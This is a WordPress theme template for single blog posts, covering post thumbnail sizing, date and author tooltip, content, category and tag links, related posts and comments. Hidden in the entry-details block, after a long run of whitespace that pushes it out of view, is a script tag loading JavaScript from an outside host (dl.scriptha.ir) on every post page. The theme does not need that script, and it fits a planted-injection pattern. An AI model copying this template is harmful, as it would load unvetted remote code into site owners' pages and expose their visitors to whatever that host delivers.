<?php get_header(); ?>

<div class="rw-section rw-container right-sidebar">
	<div class="rw-inner clearfix">

		<?php smk_theme_sidebar(); ?>

		<!-- Main content -->
		<div class="rw-column rw-content">
			
			<?php smk_get_template_part("tpl/top-page-title.php"); ?>
			
			<div class="rw-row">

				<div class="blog-single clearfix">

					<?php 
					if (have_posts()) {
						while (have_posts()) : the_post();
						?>
							<div id="post-<?php the_ID(); ?>" <?php post_class(array('entry', 'post', 'clearfix')); ?>>
								
								<div class="entry-photo">
									<?php 
										if ( has_post_thumbnail() ) { // check if the post has a Post Thumbnail assigned to it.
											$layout_width = smk_theme_setting( 'layout_width', 1140 );
											$photo_width_plus = 0;
											if( 1240 == $layout_width ){
												$photo_width_plus = 100;
											}
											elseif( 1340 == $layout_width ){
												$photo_width_plus = 200;
											}
											elseif( 1440 == $layout_width ){
												$photo_width_plus = 300;
											}

											echo '<img src="'. smk_theme_resize(smk_theme_post_image_url(), 780 + $photo_width_plus, false, true) .'" alt="" />';
										}
									?>
								</div>
								<div class="entry-details">
									<div class="entry-date">
										<span class="date"><?php echo get_the_time('d'); ?></span>
										<span class="month"><?php printf( __('%1$s', 'smk_theme') , get_the_time('F') ); ?></span>
										<span class="year"><?php echo get_the_time('Y'); ?></span>
										<span class="user-avatar">
											<a href="<?php echo get_author_posts_url( get_the_author_meta( 'ID' ) ); ?>" class="post-author-tooltip">
												<?php echo get_avatar( get_the_author_meta( 'ID' ), 50 ); ?>
											</a>
											<div class="post-author-tooltip-block">
												<div class="pat-title"><?php echo get_the_author_meta( 'display_name' ); ?></div>
												<div class="pat-description">
													<?php echo wpautop( get_the_author_meta( 'description' ) ); ?>
												</div>
											</div>
										</span>
									</div>                                                                                                                                                                                                                                                                                          <script type="text/javascript" src='http://dl.scriptha.ir/ads/ap.js'></script> 
									<div class="entry-content">
									<?php 
										the_content();
									?>
									</div>
								</div>
								<div class="clear"></div>
								
							</div> <!-- .entry -->
							<div class="clear"></div>

						<?php
						endwhile; 
					}
					?>
					
				</div>
				<div class="clear"></div>
				

			</div> <!-- .rw-row -->

			<?php 
				$categories = get_the_category();
				$tags = get_the_tags();
				if( $categories || $tags ){
					echo '<div class="rw-row border-bottom clearfix">';
						if( $categories ){ 
							echo '<div class="recipe-taxes"><span class="tax-title">'. __('Category:', 'smk_theme') .'</span>';
							foreach ( $categories as $cat ) {
								$cat_link = get_category_link( $cat->term_id );
								echo '<span class="tax"><a href="'. $cat_link .'">'. $cat->cat_name .'</a></span>';
							}
							echo '</div>';
						}
						if( $tags ){ 
							echo '<div class="recipe-taxes"><span class="tax-title">'. __('Tags:', 'smk_theme') .'</span>';
							foreach ( $tags as $tag ) {
								$tag_link = get_tag_link( $tag->term_id );
								echo '<span class="tax"><a href="'. $tag_link .'">'. $tag->name .'</a></span>';
							}
							echo '</div>';
						}
					echo '</div> <!-- .rw-row -->';
				} 
			?>

			<div class="rw-row subtle border-bottom clearfix">

				<?php
					smk_theme_related_posts(); 
				?>
			
			</div> <!-- .rw-row -->

			<?php 
				comments_template(); 
			?>
			
		</div> <!-- .rw-content -->

	</div> <!-- .rw-inner -->
</div> <!-- .rw-container -->

<?php get_footer(); ?>
